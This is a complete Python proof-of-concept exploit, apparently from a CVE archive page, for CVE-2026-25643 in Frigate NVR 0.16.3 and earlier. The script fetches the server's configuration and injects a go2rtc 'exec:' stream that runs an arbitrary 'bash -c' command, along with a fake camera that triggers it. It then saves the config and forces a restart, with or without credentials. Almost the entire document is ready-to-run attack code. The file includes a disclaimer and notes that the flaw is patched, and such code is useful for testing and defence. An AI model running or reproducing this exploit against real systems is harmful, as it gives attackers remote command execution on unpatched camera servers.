5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-25643.py PY
#!/usr/bin/env python3
"""
Frigate NVR ≤ 0.16.3 Blind RCE Exploit
CVE-2026-25643

This Python exploit targets a critical configuration manipulation vulnerability 
in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). 
By injecting a malicious go2rtc stream and a fake camera entry, 
it triggers arbitrary command execution as the Frigate process during service restart — 
no reverse shell or output capture required.

Author:          Joshua van der poll (https://github.com/joshuavanderpoll)
Created:         February 2026
Version:         1.0
License:         GNU General Public License v3.0 (GPL-3.0)
Disclaimer:      Use responsibly. This is a proof-of-concept for a patched
                 vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against
                 systems you do not own or have explicit permission to test.

Credits / References:
- jduardo2704/CVE-2026-25643-Frigate-RCE

Usage:
    python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
    python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"

"""

import requests
import argparse
import sys
import json
import urllib3
import yaml
import time

# Silence urllib3's InsecureRequestWarning: every request in this script is
# sent with verify=False, so the warning would otherwise repeat on each call.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ANSI escape sequences used to colorize console output.
GREEN  = '\033[92m'
YELLOW = '\033[93m'
RED    = '\033[91m'
BLUE   = '\033[94m'
CYAN   = '\033[96m'
RESET  = '\033[0m'  # appended after each colored message by print_status

def print_status(msg, color=BLUE, symbol="[*]"):
    """Print ``symbol`` followed by ``msg``, wrapped in ``color`` and ``RESET``."""
    line = f"{symbol} {msg}"
    print(f"{color}{line}{RESET}")

def print_success(msg):
    """Print ``msg`` in green with a ``[+]`` marker."""
    print_status(msg, color=GREEN, symbol="[+]")

def print_warning(msg):
    """Print ``msg`` in yellow with a ``[!]`` marker."""
    print_status(msg, color=YELLOW, symbol="[!]")

def print_error(msg, exc=None):
    """Print ``msg`` in red with a ``[-]`` marker, plus details of ``exc`` if given.

    Args:
        msg: Human-readable error description.
        exc: Optional exception instance. When provided, its type name and
            message are printed, followed by a short traceback (at most two
            frames) written to stderr.
    """
    import traceback

    print_status(msg, RED, "[-]")
    if exc is None:
        return

    print(f"    → {type(exc).__name__}: {exc}")
    # Print the traceback that belongs to *exc* itself. print_exc() would
    # instead report whatever exception is currently being handled, which is
    # "NoneType: None" when this helper is called outside an except block.
    traceback.print_exception(type(exc), exc, exc.__traceback__, limit=2)

def login_frigate(session, base_url, username, password):
    """POST the credentials to ``{base_url}/api/login`` using ``session``.

    Args:
        session: Object exposing a ``post`` method (a ``requests.Session``
            in this script).
        base_url: Target base URL without a trailing slash.
        username: Value sent as the ``user`` field of the JSON body.
        password: Value sent as the ``password`` field of the JSON body.

    Returns:
        True when the server answers with HTTP 200; False for any other
        status code or when the request raises.
    """
    print_status(f"Trying to authenticate as '{username}' ...")
    credentials = {"user": username, "password": password}
    try:
        response = session.post(
            f"{base_url}/api/login",
            json=credentials,
            verify=False,
            timeout=12,
        )
        print_status(f"Login → status code: {response.status_code}", CYAN)

        # Guard clause: anything other than 200 is reported as a failure.
        if response.status_code != 200:
            print_warning(f"Login failed - status: {response.status_code}")
            if response.text.strip():
                print(f"    Response: {response.text[:180].strip()}")
            return False

        print_success("Login successful")
        return True

    except Exception as e:
        print_error("Login request failed", e)
        return False

def fetch_config(session, base_url):
    """Download ``{base_url}/api/config/raw`` and parse it as YAML.

    The response body may be either plain YAML or the same YAML wrapped in a
    JSON string literal; a body that starts and ends with a double quote is
    first passed through ``json.loads`` and, if that fails, parsed as-is.

    Args:
        session: Object exposing a ``get`` method (a ``requests.Session``
            in this script).
        base_url: Target base URL without a trailing slash.

    Returns:
        The parsed configuration as a dict, or None when the request fails,
        the status is not 200, the YAML is invalid, or the parsed document
        is not a mapping.
    """
    print_status("Fetching current configuration (/api/config/raw) ...")
    try:
        resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
        print_status(f"Config fetch → HTTP {resp.status_code}", CYAN)

        if resp.status_code != 200:
            print_error(f"Cannot read config - status {resp.status_code}")
            if resp.text.strip():
                print(f"    Body preview: {resp.text[:200]}")
            return None

        content = resp.text.strip()
        print_status(f"Received {len(content)} bytes", CYAN)

        # Handle possible JSON string wrapping or direct YAML
        if content.startswith('"') and content.endswith('"'):
            try:
                content = json.loads(content)
            except json.JSONDecodeError:
                # Not a valid JSON string after all; keep the raw text and
                # let the YAML parser below decide. Only decode errors are
                # ignored so KeyboardInterrupt/SystemExit still propagate.
                pass
            else:
                print_status("Config was JSON-wrapped → unwrapped", CYAN)

        try:
            config = yaml.safe_load(content)
            if not isinstance(config, dict):
                print_error("Parsed config is not a dictionary")
                return None
            print_success(f"Config parsed successfully ({len(config)} top-level keys)")
            return config
        except yaml.YAMLError as e:
            print_error("YAML parsing failed", e)
            print(f"    Raw content preview: {content[:300]}")
            return None

    except Exception as e:
        print_error("Failed to fetch/parse configuration", e)
        return None

def send_config(session, base_url, config_data, save_option="restart"):
    """Serialize ``config_data`` to YAML and POST it to ``/api/config/save``.

    Args:
        session: Object exposing a ``post`` method (a ``requests.Session``
            in this script).
        base_url: Target base URL without a trailing slash.
        config_data: Configuration mapping to serialize with ``yaml.dump``.
        save_option: Value placed in the ``save_option`` query parameter.

    Returns:
        None. The outcome is only reported on the console; a request timeout
        is reported as a warning rather than an error.
    """
    yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
    payload_size = len(yaml_payload.encode())

    print_status(f"Sending modified config ({payload_size:,} bytes) with option: {save_option}")

    try:
        endpoint = f"{base_url}/api/config/save?save_option={save_option}"
        response = session.post(
            endpoint,
            data=yaml_payload,
            headers={"Content-Type": "text/plain"},
            timeout=10,
            verify=False,
        )
        print_status(f"Config save → HTTP {response.status_code}", CYAN)

        if response.status_code not in (200, 204):
            print_warning(f"Config rejected - status {response.status_code}")
            if response.text.strip():
                print(f"    Server response: {response.text[:300].strip()}")
        else:
            print_success("Configuration accepted (server should restart)")

    except requests.Timeout:
        print_warning("Request timed out - server might be restarting already")
    except Exception as e:
        print_error("Failed to send modified configuration", e)

def inject_command_into_config(config, command):
    """Add the ``debug_cmd`` stream and ``trigger_exec`` camera to ``config``.

    The mapping is modified in place: ``go2rtc.streams.debug_cmd`` is set to
    a single ``exec:`` source wrapping ``command``, and
    ``cameras.trigger_exec`` is set to a camera whose only ffmpeg input
    points at that stream. Missing ``go2rtc``, ``streams`` and ``cameras``
    sections are created as empty dicts first.

    Args:
        config: Parsed configuration mapping.
        command: Command string embedded in the stream source.

    Returns:
        The same ``config`` object that was passed in.
    """
    print_status(f"Preparing payload → executing: {command}")

    payload = f"bash -c '{command}'"
    print_status(f"Using payload: {payload}", CYAN)

    # go2rtc → streams
    go2rtc_section = config.setdefault('go2rtc', {})
    if 'streams' not in go2rtc_section:
        go2rtc_section['streams'] = {}

    go2rtc_section['streams']['debug_cmd'] = [f"exec:{payload}"]
    print_success("Injected malicious stream → debug_cmd")

    # Camera entry whose single input references the stream added above
    stream_input = {
        'path': 'rtsp://127.0.0.1:8554/debug_cmd',
        'roles': ['detect'],
    }
    trigger_camera = {
        'ffmpeg': {'inputs': [stream_input]},
        'detect': {'enabled': False},
        'audio':  {'enabled': False},
        'enabled': True,
    }

    config.setdefault('cameras', {})['trigger_exec'] = trigger_camera
    print_success("Injected trigger camera → trigger_exec")

    return config

def exploit_command(base_url, username, password, command):
    """Run the full sequence: optional login, fetch, modify, and save config.

    Args:
        base_url: Target base URL without a trailing slash.
        username: Login name, or a falsy value to skip authentication.
        password: Login password, or a falsy value to skip authentication.
        command: Command string handed to ``inject_command_into_config``.

    Exits the process with status 1 when the configuration cannot be fetched
    or the modified configuration cannot be prepared. The result of the login
    attempt is not checked; the sequence continues either way.
    """
    session = requests.Session()
    session.verify = False

    # Authentication is attempted only when both values are supplied.
    if not (username and password):
        print_warning("No credentials provided → attempting unauthenticated access")
    else:
        login_frigate(session, base_url, username, password)

    # Current configuration is the starting point for the modified one.
    config = fetch_config(session, base_url)
    if not config:
        print_error("Exploit aborted - cannot continue without valid config")
        sys.exit(1)

    try:
        modified_config = inject_command_into_config(config, command)
    except Exception as e:
        print_error("Failed to prepare malicious config", e)
        sys.exit(1)

    # Small delay before submitting
    time.sleep(1.2)

    send_config(session, base_url, modified_config)

    rule = "=" * 60
    print("\n" + rule)
    print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}")
    reminders = (
        " Keep in mind:",
        " • Output is NOT captured (blind execution)",
        " • Command runs as the user/frigate process",
        " • Multiple executions may occur during restart",
    )
    for reminder in reminders:
        print(reminder)
    print(rule + "\n")

def main():
    """Parse command-line arguments, echo them, and run ``exploit_command``.

    Exit codes set here: 2 when interrupted with Ctrl-C, 3 on any other
    uncaught exception.
    """
    parser = argparse.ArgumentParser(
        description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)"
    )

    # (short flag, long flag, required, help text)
    option_specs = (
        ('-u', '--url',      True,  "Target URL (http(s)://host:port)"),
        ('-U', '--username', False, "Username (optional)"),
        ('-P', '--password', False, "Password (optional)"),
        ('-c', '--cmd',      True,  "Command to execute on target"),
    )
    for short_flag, long_flag, is_required, help_text in option_specs:
        parser.add_argument(short_flag, long_flag, required=is_required, help=help_text)

    opts = parser.parse_args()

    # Trailing slashes are dropped so endpoint paths can be appended directly.
    base_url = opts.url.rstrip('/')
    print(f"\n {BLUE}Target :{RESET} {base_url}")
    if opts.username:
        print(f" {BLUE}User   :{RESET} {opts.username}")
    print(f" {BLUE}Command:{RESET} {opts.cmd}\n")

    try:
        exploit_command(
            base_url=base_url,
            username=opts.username,
            password=opts.password,
            command=opts.cmd,
        )
    except KeyboardInterrupt:
        print_warning("Interrupted by user")
        sys.exit(2)
    except Exception as e:
        print_error("Unexpected fatal error", e)
        sys.exit(3)


if __name__ == "__main__":
    main()